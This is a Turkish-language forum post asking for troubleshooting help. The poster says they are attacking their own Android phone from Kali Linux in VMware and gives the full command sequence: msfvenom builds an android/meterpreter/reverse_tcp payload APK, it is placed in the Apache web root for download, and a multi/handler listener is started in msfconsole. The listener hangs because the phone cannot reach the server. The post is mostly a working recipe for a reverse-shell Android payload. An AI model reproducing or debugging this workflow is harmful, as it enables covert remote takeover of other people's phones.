Merhabalar. Kendi android cihazıma
.apk dosyası göndermek ve Kali üzerinden sızmak istiyorum. Fakat
exploit
komutunu verdikten sonra VMware'de terminal'de şu komut ekranında kalıyor.
Started reverse TCP handler on 192.168.x.xx:4444
ifconfig
komutunu girdikten sonra çıkan IP adresini kopyalayıp o şekilde yapıyorum. Bu arada NAT seçili ağ ayarlarından VMware'de.
Bir de ilginç bir durum şu kendi
Android cihazımdan başlatmış olduğum IP adresine giremiyorum arkadaşlar.
Komutlar şunlar:
1.
ifconfig
2.
msfvenom -help
3.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.xx LPORT=4444 R > /var/www/html/androidApp.apk
4.
service apache2 status
(Daha önce başlatmıştım)
service apache2 start
komutu ile
5.
msfconsole
6.
use exploit/multi/handler
7.
set payload android/meterpreter/reverse_tcp
8.
show options
9.
set LHOST 192.168.x.xx
10.
show options
(yeniden)
11.
exploit
exploit
işte bu komutu girdikten sonra şöyle bir komut satırı geliyor ve o ekranda kalıyor. Dediğim gibi bundan sonra telefona
.apk dosyasını indirmek istiyorum ama sunucuya ulaşamıyorum telefonumdan Apache Server'e.
Böyle bir ekranda kalıyor. Rehberi
buraya tıklayarak izleyebilirsiniz. Şuradaki adamın yaptığının aynısını yapıyorum.
[*] Started reverse TCP handler on 192.168.x.xx:4444